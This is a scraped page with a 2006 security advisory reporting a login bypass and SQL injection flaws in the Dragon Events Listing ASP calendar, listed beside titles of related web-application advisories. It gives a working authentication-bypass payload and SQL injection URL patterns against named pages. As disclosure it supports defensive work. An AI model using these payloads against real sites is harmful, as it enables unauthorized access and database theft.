Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection MetaCart e-Shop [multiples injection sql (get & post)] E-commerce Kit 1 PayPal Edition [ injection sql ] TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De letion & Command Execution Vulnerablities From:laurent gaffié <saps.audit_(at)_gmail.com> Date:16.11.2006Subject:Dragon calendar [ login bypass & injection sql ]vendor site:http://www.dragoninternet.net/ product:Dragon Events Listing bug:login bypass & injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (get) http://site.com/event_searchdetail.asp?ID='[sql] http://site.com/venue_detail.asp?VenueID='[sql] laurent gaffie & benjamin mosse http://s-a-p.ca/ contact: saps.audit@gmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Xtreme ASP Photo Gallery Cross Site Scripting And SQL Injection
MetaCart e-Shop [multiples injection sql (get & post)]
E-commerce Kit 1 PayPal Edition [ injection sql ]
TorrentFlux 2.2 Arbitrary File Creation/Overwrite/De letion & Command Execution Vulnerablities
